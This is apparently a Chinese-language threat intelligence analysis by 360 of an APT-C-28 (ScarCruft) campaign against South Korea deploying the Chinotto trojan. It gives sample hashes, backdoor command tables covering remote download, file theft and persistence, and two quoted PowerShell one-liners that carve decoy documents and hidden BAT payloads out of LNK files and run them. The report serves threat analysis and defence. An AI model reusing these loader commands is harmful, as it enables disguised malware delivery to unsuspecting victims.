恶意文件携带的部分诱饵文档如下所示。
MD5 |
16a34b0e194b3f825a19db5363df4cca |
文件大小 |
24.75MB (25956367字节) |
文件类型 |
ZIP |
文件名 |
REPORT.zip |
指令 |
描述 |
pcinfo |
获取电脑信息 |
drive |
获取磁盘信息 |
clipboard |
获取剪切板数据 |
svc |
获取安装服务列表 |
process |
获取进程列表 |
fileinfo |
上传文件信息 |
start |
启动指定文件 |
plugin |
从远端下载插件执行 |
down |
从远端载文件 |
up |
上传指定文件 |
regedit |
创建注册表 |
compress |
压缩指定文件 |
MD5 |
fa03b0248a109a86eaddba108ebfcb14 |
文件大小 |
311.11KB (318581字节) |
文件类型 |
RAR |
文件名 |
hanacard_20230610.rar |
指令 |
描述 |
fileinfo |
上传文件信息 |
dir |
收集指定目录下文件并压缩上传 |
file |
上传指定文件 |
down |
从远程下载文件 |
regedit |
创建注册表 |
task |
注册计划任务 |
zip |
解压指定文件 |
rename |
重命名文件 |
del |
删除指定文件 |
/c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match ‘System32’ -or $dirPath -Match ‘Program Files’) {$dirPath = ‘%temp%’}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x0000AB7F4E} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00085268 -ReadCount 00085268; $pdfPath = ‘%temp%2023년도 4월 29일세미나.pdf’; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002390)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00088506 -ReadCount 00088506; $exePath = ‘%temp%230415.bat’; sc $exePath ([byte[]]($exeFile ^| select -Skip 00085268)) -Encoding Byte; ^& $exePath; |
/c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match ‘System32’ -or $pEbjEn -Match ‘Program Files’) {$pEbjEn = ‘%temp%’};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^| where-object {$_.length -eq 0x18C0000} ^| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match ‘Object’){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = ‘%temp%현황조사표.xlsx’;sc $tyxkEP ([byte[]]($C5ytw ^| select -Skip 62464)) -Encoding Byte; ^& $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = ‘%temp%PMmVvG56FLC9y.bat’;sc $WH9lSPHOFI ([byte[]]($Cbe1yj ^| select -Skip 74342)) -Encoding Byte;^& %windir%SysWOW64cmd.exe /c $WH9lSPHOFI; |
APT-C-28(ScarCruft)组织自被披露以来长期保持针对目标国家及地区的网络攻击行动,并且有愈演愈烈的趋势。在本轮攻击中,攻击者通过制造诱饵钓鱼页面的方式收集受害者个人信息,并且每次执行都会设置自启以维持控制,自启加载的远端连接灵活多变;此外,在短时间内我们还观察到了同一载荷的不同编码样本,可见该组织一直在积极备战,并展现出对目标的专注,内存加载的Chinotto木马功能丰富,从指令来看,相信还有更多的功能未被披露,后续我们也将持续跟进。
在这里提醒用户加强安全意识,切勿执行未知文件或点击来历不明的链接等操作。这些行为可能导致系统在没有任何防范的情况下被攻陷,从而导致机密文件和重要情报的泄漏。
360聚能过去20年实战经验及能力推出360安全云,目前,360安全云已实现对此类威胁的全面检出,全力守护千行百业数字安全。
360高级威胁研究院
原文始发于微信公众号(360威胁情报中心):APT-C-28(ScarCruft)组织针对韩国部署Chinotto组件的活动分析